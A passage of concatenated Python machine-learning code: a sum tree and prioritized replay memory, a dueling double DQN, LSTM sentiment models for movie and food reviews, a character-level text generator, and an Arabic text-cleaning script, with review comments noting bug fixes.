        """Store `data` with `priority`, overwriting the oldest entry when full."""
        # leaves occupy the last `length` slots of the tree array
        tree_index = self.data_pointer + self.length - 1
        self.data[self.data_pointer] = data
        # update the leaf and propagate the change up
        self.update(tree_index, priority)
        self.data_pointer += 1
        if self.data_pointer >= self.length:
            # above capacity: wrap around and overwrite the oldest experience
            self.data_pointer = 0

    def update(self, tree_index, priority):
        """Set a leaf's priority and propagate the delta up to the root."""
        change = priority - self.tree[tree_index]
        self.tree[tree_index] = priority
        while tree_index != 0:  # faster than the recursive reference code
            tree_index = (tree_index - 1) // 2  # parent index
            self.tree[tree_index] += change

    def get_leaf(self, v):
        """Return (leaf_index, priority, data) for a sample value v in [0, total].

        Tree structure and array storage:
            Tree index:
                 0       -> storing priority sum
                / \
               1   2
              / \ / \
             3  4 5  6  -> storing priority for experiences
            Array type for storing: [0,1,2,3,4,5,6]
        """
        parent_index = 0
        while True:  # faster than the recursive reference code
            left_child_index = 2 * parent_index + 1
            right_child_index = left_child_index + 1
            # reached the bottom: parent is a leaf
            if left_child_index >= len(self.tree):
                leaf_index = parent_index
                break
            else:  # downward search, always toward the subtree containing v
                if v <= self.tree[left_child_index]:
                    parent_index = left_child_index
                else:
                    v -= self.tree[left_child_index]
                    parent_index = right_child_index
        data_index = leaf_index - self.length + 1
        return leaf_index, self.tree[leaf_index], self.data[data_index]

    # bug fix: was a bare `property` expression, so total_priority was a
    # plain method and `tree.total_priority` returned a bound method object
    @property
    def total_priority(self):
        return self.tree[0]  # the root node holds the sum of all priorities
class Memory:
    """Prioritized experience replay (PER) memory backed by a SumTree.

    Priorities are p = (|error| + PER_e) ** PER_a; sampling is stratified
    over [0, total_priority] and returns importance-sampling weights whose
    exponent PER_b is annealed toward 1 over training.
    """
    # avoid experiences ever having 0 probability of getting picked
    PER_e = 0.01
    # tradeoff between high-priority-only and uniform random sampling
    PER_a = 0.6
    # importance-sampling exponent, annealed from this value to 1
    PER_b = 0.4
    PER_b_increment_per_sample = 0.001
    absolute_error_upper = 1.0  # priority clip

    def __init__(self, capacity):
        # SumTree instead of a deque: a deque would shift every experience's
        # index each timestep; the tree simply overwrites slots when full
        self.tree = SumTree(length=capacity)

    def store(self, experience):
        """Store a new experience with the current max leaf priority.

        New experiences get max priority (refined later by batch_update) so
        they are guaranteed to be replayed at least once.
        """
        max_priority = np.max(self.tree.tree[-self.tree.length:])
        # if max priority is 0 the experience would never be picked
        if max_priority == 0:
            max_priority = self.absolute_error_upper
        self.tree.add(max_priority, experience)

    def sample(self, n):
        """Draw a minibatch of n experiences.

        [0, total_priority] is divided into n equal segments; one value is
        sampled uniformly per segment and mapped to a leaf. Returns
        (tree indices, list of [experience], IS weights of shape (n, 1)).
        """
        memory = []
        b_idx = np.zeros((n, ), dtype=np.int32)
        b_is_weights = np.zeros((n, 1), dtype=np.float32)
        # stratified sampling: one draw per equal priority segment
        priority_segment = self.tree.total_priority / n
        # anneal b toward 1
        self.PER_b = np.min([1., self.PER_b + self.PER_b_increment_per_sample])
        # max weight normalizer so that all IS weights are <= 1
        p_min = np.min(self.tree.tree[-self.tree.length:]) / self.tree.total_priority
        max_weight = (p_min * n) ** (-self.PER_b)
        for i in range(n):
            a, b = priority_segment * i, priority_segment * (i + 1)
            value = np.random.uniform(a, b)
            index, priority, data = self.tree.get_leaf(value)
            sampling_probs = priority / self.tree.total_priority  # P(j)
            # IS = (1/N * 1/P(i))**b / max_w == (N*P(i))**-b / max_w
            b_is_weights[i, 0] = np.power(n * sampling_probs, -self.PER_b) / max_weight
            b_idx[i] = index
            memory.append([data])
        return b_idx, memory, b_is_weights

    def batch_update(self, tree_idx, abs_errors):
        """Update the tree priorities from new absolute TD errors."""
        # use `+` not `+=` so the caller's array is not mutated in place
        abs_errors = abs_errors + self.PER_e
        # bug fix: np.min collapsed the whole batch to one scalar;
        # np.minimum clips each error elementwise against the upper bound
        clipped_errors = np.minimum(abs_errors, self.absolute_error_upper)
        ps = np.power(clipped_errors, self.PER_a)
        for ti, p in zip(tree_idx, ps):
            self.tree.update(ti, p)
import tensorflow as tf
class DDDQNNet:
    """ Dueling Double Deep Q Neural Network (TF1 graph-mode). """
    def __init__(self, state_size, action_size, learning_rate, name):
        """Build placeholders, a 3-layer dense trunk, dueling value/advantage
        streams, the PER-weighted MSE loss and an RMSProp train op, all under
        a variable scope named `name` so DQN vs target-net weights can be
        told apart and copied.
        """
        self.state_size = state_size
        self.action_size = action_size
        self.learning_rate = learning_rate
        self.name = name
        # we use tf.variable_scope to know which network we're using (DQN or the Target net)
        # it'll be helpful when we update our w- parameters (by copying the DQN parameters)
        with tf.variable_scope(self.name):
            # placeholders
            self.inputs_ = tf.placeholder(tf.float32, [None, *state_size], name="inputs")
            # per-sample importance-sampling weights coming from the PER memory
            self.is_weights_ = tf.placeholder(tf.float32, [None, 1], name="is_weights")
            # one-hot encoded actions taken
            self.actions_ = tf.placeholder(tf.float32, [None, self.action_size], name="actions_")
            # target Q
            self.target_q = tf.placeholder(tf.float32, [None], name="target")
            # neural net trunk: three 32-unit dense layers
            # NOTE(review): activation is passed as the string "relu" on the
            # first two layers and omitted (linear) on the third
            self.dense1 = tf.layers.dense(inputs=self.inputs_,
                                          units=32,
                                          name="dense1",
                                          kernel_initializer=tf.contrib.layers.xavier_initializer(),
                                          activation="relu")
            self.dense2 = tf.layers.dense(inputs=self.dense1,
                                          units=32,
                                          name="dense2",
                                          kernel_initializer=tf.contrib.layers.xavier_initializer(),
                                          activation="relu")
            self.dense3 = tf.layers.dense(inputs=self.dense2,
                                          units=32,
                                          name="dense3",
                                          kernel_initializer=tf.contrib.layers.xavier_initializer())
            # here we separate into two streams (dueling)
            # this one is the State-Value function V(s)
            self.value = tf.layers.dense(inputs=self.dense3,
                                         units=1,
                                         kernel_initializer=tf.contrib.layers.xavier_initializer(),
                                         activation=None,
                                         name="value"
                                         )
            # and this one is the Advantage function A(s, a)
            self.advantage = tf.layers.dense(inputs=self.dense3,
                                             units=self.action_size,
                                             activation=None,
                                             kernel_initializer=tf.contrib.layers.xavier_initializer(),
                                             name="advantage"
                                             )
            # aggregation
            # Q(s, a) = V(s) + ( A(s, a) - 1/|A| * sum A(s, a') )
            self.output = self.value + tf.subtract(self.advantage, tf.reduce_mean(self.advantage, axis=1, keepdims=True))
            # Q is our predicted Q value: mask the output with the one-hot action
            # NOTE(review): reduce_sum has no axis here, so Q is a scalar over
            # the whole batch rather than per-sample — verify against callers
            self.Q = tf.reduce_sum(tf.multiply(self.output, self.actions_))
            # absolute TD errors, fed back to the PER memory as new priorities
            self.absolute_errors = tf.abs(self.target_q - self.Q)
            # loss = IS-weight * (target_q - q)**2
            self.loss = tf.reduce_mean(self.is_weights_ * tf.squared_difference(self.target_q, self.Q))
            self.optimizer = tf.train.RMSPropOptimizer(self.learning_rate).minimize(self.loss)
import numpy
class SumTree:
    """Array-backed binary sum tree.

    Leaves hold priorities, internal nodes hold the sums of their children,
    and `data` stores the payloads parallel to the leaves. `write` points at
    the next leaf slot and wraps around once the tree is full.
    """
    write = 0

    def __init__(self, capacity):
        self.capacity = capacity
        self.tree = numpy.zeros(2 * capacity - 1)
        self.data = numpy.zeros(capacity, dtype=object)

    def _propagate(self, idx, change):
        # iterative walk to the root, adding the delta at every ancestor
        parent = (idx - 1) // 2
        self.tree[parent] += change
        while parent != 0:
            parent = (parent - 1) // 2
            self.tree[parent] += change

    def _retrieve(self, idx, s):
        # descend toward the leaf whose cumulative priority range contains s
        while True:
            left = 2 * idx + 1
            if left >= len(self.tree):
                return idx
            if s <= self.tree[left]:
                idx = left
            else:
                s -= self.tree[left]
                idx = left + 1

    def total(self):
        """Sum of all stored priorities (the root node)."""
        return self.tree[0]

    def add(self, p, data):
        """Store `data` with priority `p`, overwriting the oldest entry when full."""
        leaf = self.write + self.capacity - 1
        self.data[self.write] = data
        self.update(leaf, p)
        self.write = (self.write + 1) % self.capacity

    def update(self, idx, p):
        """Set leaf `idx` to priority `p` and repair every ancestor sum."""
        delta = p - self.tree[idx]
        self.tree[idx] = p
        self._propagate(idx, delta)

    def get(self, s):
        """Return (tree_index, priority, data) for the sampled value `s`."""
        idx = self._retrieve(0, s)
        return (idx, self.tree[idx], self.data[idx - self.capacity + 1])
import numpy as np
from string import punctuation
from collections import Counter
from sklearn.model_selection import train_test_split
# ---------- load and clean the raw IMDB-style review data ----------
with open("data/reviews.txt") as f:
    reviews = f.read()
with open("data/labels.txt") as f:
    labels = f.read()
# remove all punctuations
all_text = ''.join([ c for c in reviews if c not in punctuation ])
reviews = all_text.split("\n")
reviews = [ review.strip() for review in reviews ]
all_text = ' '.join(reviews)
words = all_text.split()
print("Total words:", len(words))
# encoding the words: dictionary that maps vocab words to integers
vocab = sorted(set(words))
print("Unique words:", len(vocab))
# start is 1 because 0 is reserved for padding
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# encode each review as a list of word ids
encoded_reviews = []
for review in reviews:
    encoded_reviews.append([vocab2int[word] for word in review.split()])
# dtype=object: reviews are ragged (different lengths); a plain np.array of
# ragged lists is an error on modern numpy
encoded_reviews = np.array(encoded_reviews, dtype=object)
# encode the labels, 1 for 'positive' and 0 for 'negative'
labels = labels.split("\n")
# bug fix: `label is 'positive'` compared object identity, which is not
# guaranteed for strings — use equality
labels = [1 if label == 'positive' else 0 for label in labels]
review_lens = [len(x) for x in encoded_reviews]
counter_reviews_lens = Counter(review_lens)
# remove any reviews with 0 length
cleaned_encoded_reviews, cleaned_labels = [], []
for review, label in zip(encoded_reviews, labels):
    if len(review) != 0:
        cleaned_encoded_reviews.append(review)
        cleaned_labels.append(label)
encoded_reviews = np.array(cleaned_encoded_reviews, dtype=object)
labels = cleaned_labels
# left-pad (or truncate) every review to a fixed sequence_length
sequence_length = 200
features = np.zeros((len(encoded_reviews), sequence_length), dtype=int)
for i, review in enumerate(encoded_reviews):
    features[i, -len(review):] = review[:sequence_length]
# split data into train, validation and test
split_frac = 0.9
X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=1-split_frac)
X_test, X_validation, y_test, y_validation = train_test_split(X_test, y_test, test_size=0.5)
print(f"""Features shapes:
Train set: {X_train.shape}
Validation set: {X_validation.shape}
Test set: {X_test.shape}""")
print("Example:")
print(X_train[0])
print(y_train[0])
import tensorflow as tf
from utils import get_batches
from train import *
import tensorflow as tf
from preprocess import vocab2int, X_train, y_train, X_validation, y_validation, X_test, y_test
from utils import get_batches
import numpy as np
def get_lstm_cell():
    """Build one dropout-wrapped LSTM cell.

    Relies on the module-level ``lstm_size`` and the ``keep_prob``
    placeholder, which are defined later in the file but exist by the time
    this function is called inside the graph-building block.
    """
    # basic LSTM cell
    lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
    # dropout to the cell
    drop = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
    return drop
# RNN parameters
lstm_size = 256
lstm_layers = 1
batch_size = 256
learning_rate = 0.001
n_words = len(vocab2int) + 1 # Added 1 for the 0 that is for padding
# create the graph object
graph = tf.Graph()
# add nodes to the graph
with graph.as_default():
    # token ids, star labels and dropout keep probability
    inputs = tf.placeholder(tf.int32, (None, None), "inputs")
    labels = tf.placeholder(tf.int32, (None, None), "labels")
    keep_prob = tf.placeholder(tf.float32, name="keep_prob")
# number of units in the embedding layer
embedding_size = 300
with graph.as_default():
    # embedding lookup matrix, uniformly initialized in [-1, 1]
    embedding = tf.Variable(tf.random_uniform((n_words, embedding_size), -1, 1))
    # pass to the LSTM cells
    embed = tf.nn.embedding_lookup(embedding, inputs)
    # stack up multiple LSTM layers
    cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell() for i in range(lstm_layers)])
    initial_state = cell.zero_state(batch_size, tf.float32)
    # run the data through the RNN: returns outputs for each time step
    # and the final state of the hidden layer
    outputs, final_state = tf.nn.dynamic_rnn(cell, embed, initial_state=initial_state)
    # grab the last output only; sigmoid for binary classification
    predictions = tf.contrib.layers.fully_connected(outputs[:, -1], 1, activation_fn=tf.sigmoid)
    # calculate cost using MSE
    cost = tf.losses.mean_squared_error(labels, predictions)
    optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
    # nodes to calculate the accuracy
    correct_pred = tf.equal(tf.cast(tf.round(predictions), tf.int32), labels)
    accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
saver = tf.train.Saver()
########### training ##########
epochs = 10
with tf.Session(graph=graph) as sess:
    # train the sentiment LSTM; every 25 iterations run a validation pass
    sess.run(tf.global_variables_initializer())
    iteration = 1
    for e in range(epochs):
        state = sess.run(initial_state)
        for i, (x, y) in enumerate(get_batches(X_train, y_train, batch_size=batch_size)):
            y = np.array(y)
            x = np.array(x)
            feed = {inputs: x, labels: y[:, None],
                    keep_prob: 0.5,
                    initial_state: state}
            loss, state, _ = sess.run([cost, final_state, optimizer], feed_dict=feed)
            if iteration % 5 == 0:
                print(f"[Epoch: {e}/{epochs}] Iteration: {iteration} Train loss: {loss:.3f}")
            if iteration % 25 == 0:
                val_acc = []
                # fresh zero state for the validation pass
                val_state = sess.run(cell.zero_state(batch_size, tf.float32))
                for x, y in get_batches(X_validation, y_validation, batch_size=batch_size):
                    x, y = np.array(x), np.array(y)
                    feed = {inputs: x, labels: y[:, None],
                            keep_prob: 1, initial_state: val_state}
                    batch_acc, val_state = sess.run([accuracy, final_state], feed_dict=feed)
                    val_acc.append(batch_acc)
                print(f"val_acc: {np.mean(val_acc):.3f}")
            iteration += 1
    # bug fix: was "chechpoints/..." (typo), so the later restore from
    # 'checkpoints' could never find the trained weights
    saver.save(sess, "checkpoints/sentiment1.ckpt")
test_acc = []
# evaluate the restored model on the held-out test set
with tf.Session(graph=graph) as sess:
    saver = tf.train.Saver()
    # NOTE(review): ensure the training code saves under 'checkpoints/' so
    # this restore actually finds a checkpoint
    saver.restore(sess, tf.train.latest_checkpoint('checkpoints'))
    test_state = sess.run(cell.zero_state(batch_size, tf.float32))
    for ii, (x, y) in enumerate(get_batches(X_test, y_test, batch_size), 1):
        feed = {inputs: x,
                labels: y[:, None],
                keep_prob: 1,
                initial_state: test_state}
        batch_acc, test_state = sess.run([accuracy, final_state], feed_dict=feed)
        test_acc.append(batch_acc)
    print("Test accuracy: {:.3f}".format(np.mean(test_acc)))
def get_batches(x, y, batch_size=100):
    """Yield (x, y) slices of exactly batch_size items each.

    The trailing remainder that does not fill a whole batch is dropped,
    matching the original behavior.
    """
    usable = (len(x) // batch_size) * batch_size
    x, y = x[:usable], y[:usable]
    start = 0
    while start < usable:
        stop = start + batch_size
        yield x[start:stop], y[start:stop]
        start = stop
import numpy as np
import pandas as pd
import tqdm
from string import punctuation
# set membership keeps the per-character punctuation test O(1)
punc = set(punctuation)
# one-shot script: clean the Amazon fine-food reviews and save a 2-column copy
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
X = np.zeros((len(df), 2), dtype=object)
for i in tqdm.tqdm(range(len(df)), "Cleaning X"):
    target = df['Text'].loc[i]
    # X.append(''.join([ c.lower() for c in target if c not in punc ]))
    # lowercase the text and strip all punctuation characters
    X[i, 0] = ''.join([ c.lower() for c in target if c not in punc ])
    X[i, 1] = df['Score'].loc[i]
pd.DataFrame(X, columns=["Text", "Score"]).to_csv("data/Reviews.csv")
### Model Architecture hyper parameters
embedding_size = 64
# sequence_length = 500
sequence_length = 42  # max tokens fed to the model per review
LSTM_units = 128
### Training parameters
batch_size = 128
epochs = 20
### Preprocessing parameters
# words that occur less than N times are deleted from the dataset
N = 10
# test size as a ratio; train size is 1 - test_size
test_size = 0.15
from keras.models import Sequential
from keras.layers import Embedding, LSTM, Dense, Activation, LeakyReLU, Dropout, TimeDistributed
from keras.layers import SpatialDropout1D
from config import LSTM_units
def get_model_binary(vocab_size, sequence_length, embedding_size=64, verbose=1):
    """Build the binary (positive/negative) sentiment LSTM classifier.

    Generalized to mirror get_model_5stars: embedding_size is now a
    parameter (default 64 preserves the old hard-coded value) and verbose
    controls the summary printout (default 1 keeps the old always-print
    behavior). Existing callers are unaffected.
    """
    model = Sequential()
    model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
    model.add(SpatialDropout1D(0.15))
    model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
    model.add(Dropout(0.3))
    # single sigmoid unit: probability of the positive class
    model.add(Dense(1, activation='sigmoid'))
    if verbose:
        model.summary()
    return model
def get_model_5stars(vocab_size, sequence_length, embedding_size, verbose=0):
    """Build the 1-to-5-star rating regressor (single linear output unit)."""
    layers = [
        Embedding(vocab_size, embedding_size, input_length=sequence_length),
        SpatialDropout1D(0.15),
        LSTM(LSTM_units, recurrent_dropout=0.2),
        Dropout(0.3),
        Dense(1, activation="linear"),
    ]
    model = Sequential(layers)
    if verbose:
        model.summary()
    return model
import numpy as np
import pandas as pd
import tqdm
import pickle
from collections import Counter
from sklearn.model_selection import train_test_split
from utils import clean_text, tokenize_words
from config import N, test_size
def load_review_data():
    """Load the Amazon fine-food reviews CSV, clean and tokenize the
    'Summary' column, and return (X_train, X_test, y_train, y_test, vocab).

    Side effect: pickles the vocab2int mapping to data/vocab2int.pickle so
    the test/eval scripts can re-tokenize input the same way.
    """
    # df = pd.read_csv("data/Reviews.csv")
    df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
    # preview
    print(df.head())
    print(df.tail())
    vocab = []
    # X = np.zeros((len(df)*2, 2), dtype=object)
    X = np.zeros((len(df), 2), dtype=object)
    # for i in tqdm.tqdm(range(len(df)), "Cleaning X1"):
    #     target = df['Text'].loc[i]
    #     score = df['Score'].loc[i]
    #     X[i, 0] = clean_text(target)
    #     X[i, 1] = score
    #     for word in X[i, 0].split():
    #         vocab.append(word)
    # k = i+1
    k = 0
    # only the short 'Summary' field is used as model input (not 'Text')
    for i in tqdm.tqdm(range(len(df)), "Cleaning X2"):
        target = df['Summary'].loc[i]
        score = df['Score'].loc[i]
        X[i+k, 0] = clean_text(target)
        X[i+k, 1] = score
        for word in X[i+k, 0].split():
            vocab.append(word)
    # vocab = set(vocab)
    vocab = Counter(vocab)
    # delete words that occur less than N times (noise / typos)
    vocab = { k:v for k, v in vocab.items() if v >= N }
    # word to integer encoder dict; ids start at 1, 0 is the pad id
    vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
    # pickle vocab2int for testing
    print("Pickling vocab2int...")
    pickle.dump(vocab2int, open("data/vocab2int.pickle", "wb"))
    # encode reviews as id arrays (unknown words become 0)
    for i in tqdm.tqdm(range(X.shape[0]), "Tokenizing words"):
        X[i, 0] = tokenize_words(str(X[i, 0]), vocab2int)
    lengths = [ len(row) for row in X[:, 0] ]
    print("min_length:", min(lengths))
    print("max_length:", max(lengths))
    X_train, X_test, y_train, y_test = train_test_split(X[:, 0], X[:, 1], test_size=test_size, shuffle=True, random_state=19)
    return X_train, X_test, y_train, y_test, vocab
import os
# disable keras loggings by silencing stderr around the keras import
import sys
stderr = sys.stderr
sys.stderr = open(os.devnull, 'w')
import keras
sys.stderr = stderr
# to use CPU
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
# NOTE(review): this ConfigProto is built but never passed to a session here
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                       )
from model import get_model_5stars
from utils import clean_text, tokenize_words
from config import embedding_size, sequence_length
from keras.preprocessing.sequence import pad_sequences
import pickle
# vocabulary pickled by the preprocessing step; weights from training
vocab2int = pickle.load(open("data/vocab2int.pickle", "rb"))
model = get_model_5stars(len(vocab2int), sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V20_0.38_0.80.h5")
if __name__ == "__main__":
    # CLI: predict the star rating of a single review passed as an argument
    import argparse
    parser = argparse.ArgumentParser(description="Food Review evaluator")
    parser.add_argument("review", type=str, help="The review of the product in text")
    args = parser.parse_args()
    # clean -> tokenize -> left-pad to the training sequence length
    review = tokenize_words(clean_text(args.review), vocab2int)
    x = pad_sequences([review], maxlen=sequence_length)
    # regression head: predicted rating out of 5 stars
    print(f"{model.predict(x)[0][0]:.2f}/5")
# to use CPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import os
import numpy as np
import pandas as pd
from keras.callbacks import ModelCheckpoint
from keras.preprocessing import sequence
from preprocess import load_review_data
from model import get_model_5stars
from config import sequence_length, embedding_size, batch_size, epochs
X_train, X_test, y_train, y_test, vocab = load_review_data()
vocab_size = len(vocab)
print("Vocab size:", vocab_size)
# pad/truncate every review to a fixed length for the embedding layer
X_train = sequence.pad_sequences(X_train, maxlen=sequence_length)
X_test = sequence.pad_sequences(X_test, maxlen=sequence_length)
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape)
model = get_model_5stars(vocab_size, sequence_length=sequence_length, embedding_size=embedding_size)
# resume from a previous checkpoint
# NOTE(review): fails on a fresh run if this weights file is absent — verify
model.load_weights("results/model_V40_0.60_0.67.h5")
model.compile(loss="mse", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
    os.mkdir("results")
# keep only checkpoints that improve validation loss
checkpointer = ModelCheckpoint("results/model_V40_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=True, verbose=1)
model.fit(X_train, y_train, epochs=epochs,
          validation_data=(X_test, y_test),
          batch_size=batch_size,
          callbacks=[checkpointer])
import numpy as np
from string import punctuation
# set membership makes the per-character punctuation test O(1)
punc = set(punctuation)

def clean_text(text):
    """Lowercase *text* (coerced to str) and drop every punctuation character."""
    kept = (ch.lower() for ch in str(text) if ch not in punc)
    return ''.join(kept)
def tokenize_words(words, vocab2int):
    """Map a whitespace-separated string to an array of word ids.

    Words missing from *vocab2int* keep the id 0 (no explicit <unk> token).
    Returns a float ndarray, matching the original implementation.
    """
    tokens = words.split()
    encoded = np.zeros((len(tokens),))
    for idx, token in enumerate(tokens):
        # dict.get with default 0 replaces the original try/except KeyError
        encoded[idx] = vocab2int.get(token, 0)
    return encoded
import numpy as np
import pickle
import tqdm
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, Activation
from keras.callbacks import ModelCheckpoint
seed = "import os"
# output:
# ded of and alice as it go on and the court
# well you wont you wouldncopy thing
# there was not a long to growing anxiously any only a low every cant
# go on a litter which was proves of any only here and the things and the mort meding and the mort and alice was the things said to herself i cant remeran as if i can repeat eften to alice any of great offf its archive of and alice and a cancur as the mo
# id<->char maps pickled by the training script
char2int = pickle.load(open("python-char2int.pickle", "rb"))
int2char = pickle.load(open("python-int2char.pickle", "rb"))
sequence_length = 100
n_unique_chars = len(char2int)
# building the model (must match the architecture used at training time)
model = Sequential([
    LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
    Dropout(0.3),
    LSTM(256),
    Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
# generate 400 characters
generated = ""
for i in tqdm.tqdm(range(400), "Generating text"):
    # make the input sequence: one-hot, right-aligned so a short seed is left-padded
    X = np.zeros((1, sequence_length, n_unique_chars))
    for t, char in enumerate(seed):
        X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1
    # predict the next character
    predicted = model.predict(X, verbose=0)[0]
    # converting the vector to an integer (greedy argmax decoding)
    next_index = np.argmax(predicted)
    # converting the integer to a character
    next_char = int2char[next_index]
    # add the character to results
    generated += next_char
    # shift seed by one and append the prediction (seed keeps a constant length)
    seed = seed[1:] + next_char
print("Generated text:")
print(generated)
import numpy as np
import os
import pickle
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout
from keras.callbacks import ModelCheckpoint
from utils import get_batches
# import requests
# content = requests.get("http://www.gutenberg.org/cache/epub/11/pg11.txt").text
# open("data/wonderland.txt", "w", encoding="utf-8").write(content)
from string import punctuation
# read the data
# text = open("data/wonderland.txt", encoding="utf-8").read()
# NOTE(review): file handle is never closed; acceptable for a one-shot script
text = open("E:\\datasets\\text\\my_python_code.py").read()
# remove caps
text = text.lower()
# strip a small set of characters (currently only "!")
for c in "!":
    text = text.replace(c, "")
# text = text.lower().replace("\n\n", "\n").replace("", "").replace("", "").replace("", "").replace("", "")
# text = text.translate(str.maketrans("", "", punctuation))
# text = text[:100_000]
n_chars = len(text)
unique_chars = ''.join(sorted(set(text)))
print("unique_chars:", unique_chars)
n_unique_chars = len(unique_chars)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(unique_chars)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(unique_chars)}
# save these dictionaries for later generation
pickle.dump(char2int, open("python-char2int.pickle", "wb"))
pickle.dump(int2char, open("python-int2char.pickle", "wb"))
# hyper parameters
sequence_length = 100
step = 1
batch_size = 128
epochs = 1
# build (input window, next char) training pairs with a sliding window
sentences = []
y_train = []
for i in range(0, len(text) - sequence_length, step):
    sentences.append(text[i: i + sequence_length])
    y_train.append(text[i+sequence_length])
print("Number of sentences:", len(sentences))
# one-hot encode lazily via a generator to keep memory bounded
X = get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps=step)
# for i, x in enumerate(X):
#     if i == 1:
#         break
#     print(x[0].shape, x[1].shape)
# # vectorization
# X = np.zeros((len(sentences), sequence_length, n_unique_chars))
# y = np.zeros((len(sentences), n_unique_chars))
# for i, sentence in enumerate(sentences):
#     for t, char in enumerate(sentence):
#         X[i, t, char2int[char]] = 1
#     y[i, char2int[y_train[i]]] = 1
# X = np.array([char2int[c] for c in text])
# print("X.shape:", X.shape)
# goal of X is (n_samples, sequence_length, n_chars)
# sentences = np.zeros(())
# print("y.shape:", y.shape)
# building the model
# model = Sequential([
#     LSTM(128, input_shape=(sequence_length, n_unique_chars)),
#     Dense(n_unique_chars, activation="softmax"),
# ])
# building the model
model = Sequential([
    LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
    Dropout(0.3),
    LSTM(256),
    Dense(n_unique_chars, activation="softmax"),
])
# resume training from a previous checkpoint
model.load_weights("results/python-v2-2.48.h5")
model.summary()
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
    os.mkdir("results")
# checkpoint file is named after the training loss of that epoch
checkpoint = ModelCheckpoint("results/python-v2-{loss:.2f}.h5", verbose=1)
# model.fit(X, y, batch_size=batch_size, epochs=epochs, callbacks=[checkpoint])
model.fit_generator(X, steps_per_epoch=len(sentences) // batch_size, epochs=epochs, callbacks=[checkpoint])
import numpy as np
def get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps):
    """Endlessly yield one-hot (X, y) batches for char-level training.

    X has shape (batch_size, sequence_length, n_unique_chars) — one-hot
    input windows; y has shape (batch_size, n_unique_chars) — one-hot
    next-char targets. Cycles over the data forever (Keras generator style).

    Bug fixes vs. the original: the inner loop no longer shadows the batch
    offset variable, and targets are indexed at the global position
    ``start + row`` instead of always reading ``y_train[0:batch_size]``,
    which gave every batch after the first the wrong labels. The unused
    ``chars_per_batch``/``n_batches`` locals are removed, and the label
    assignment is hoisted out of the per-character loop.
    """
    while True:
        for start in range(0, len(sentences), batch_size):
            X = np.zeros((batch_size, sequence_length, n_unique_chars))
            y = np.zeros((batch_size, n_unique_chars))
            for row, sentence in enumerate(sentences[start: start + batch_size]):
                for t, char in enumerate(sentence):
                    X[row, t, char2int[char]] = 1
                # one label per sample, taken at the global dataset position
                y[row, char2int[y_train[start + row]]] = 1
            yield X, y
from pyarabic.araby import ALPHABETIC_ORDER
with open("quran.txt", encoding="utf8") as f:
    text = f.read()
unique_chars = set(text)
print("unique chars:", unique_chars)
# keep only Arabic letters (per pyarabic's alphabet), plus space and '.'
arabic_alpha = { c for c, order in ALPHABETIC_ORDER.items() }
to_be_removed = unique_chars - arabic_alpha
to_be_removed = to_be_removed - {'.', ' ', ''}
print(to_be_removed)
# NOTE(review): replacing the empty string inserts '.' between EVERY pair of
# characters; the first argument was most likely a non-ASCII verse separator
# that was lost in a transcoding step — verify against the original file.
text = text.replace("", ".")
for char in to_be_removed:
    text = text.replace(char, "")
# NOTE(review): these look like whitespace-collapse replacements, but the
# search strings may also have lost characters in transcoding — verify.
text = text.replace(" ", " ")
text = text.replace(" \n", "")
text = text.replace("\n ", "")
with open("quran_cleaned.txt", "w", encoding="utf8") as f:
    print(text, file=f)
from sklearn.model_selection import GridSearchCV
from keras.wrappers.scikit_learn import KerasClassifier
from utils import read_data, text_to_sequence, get_batches, get_data
from models import rnn_model
from keras.layers import LSTM
import numpy as np
text, int2char, char2int = read_data()
batch_size = 256
test_size = 0.2
n_steps = 200
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
# integer-encode the corpus, then hold out the tail as the test split
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
# +1 on vocab_size leaves room for the 0 padding id
X, Y = get_data(X_train, batch_size, n_steps, vocab_size=vocab_size+1)
print(X.shape)
print(Y.shape)
